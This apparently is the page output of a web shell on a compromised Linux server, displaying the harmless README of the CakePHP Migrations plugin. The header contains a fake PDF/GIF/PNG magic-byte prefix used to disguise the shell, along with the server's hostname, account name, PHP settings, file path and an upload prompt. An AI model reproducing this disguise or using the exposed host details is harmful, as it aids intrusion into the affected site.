%PDF- %GIF98; %PNG;
Server : ApacheSystem : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64 User : addictionfreeind ( 1003) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Directory : /home/addictionfreeind/public_html/vendor/cakephp/migrations/ |
Upload File : |
# Migrations plugin for CakePHP
[](LICENSE.txt)
[](https://travis-ci.org/cakephp/migrations)
[](https://codecov.io/github/cakephp/migrations?branch=master)
[](https://packagist.org/packages/cakephp/migrations)
This is a Database Migrations system for CakePHP 3.
The plugin consists of a CakePHP shell wrapper for the [phinx](http://phinx.org) migrations library.
## Installation
You can install this plugin into your CakePHP application using [composer](http://getcomposer.org).
Run the following command
```sh
composer require cakephp/migrations
```
## Configuration
You can load the plugin using the shell command:
```
bin/cake plugin load Migrations
```
Or you can manually add the loading statement in the **config/bootstrap.php** file of your application:
```php
Plugin::load('Migrations');
```
Additionally, you will need to configure the ``default`` database configuration in your **config/app.php** file.
## Documentation
Full documentation of the plugin can be found on the [CakePHP Cookbook](http://book.cakephp.org/3.0/en/migrations.html).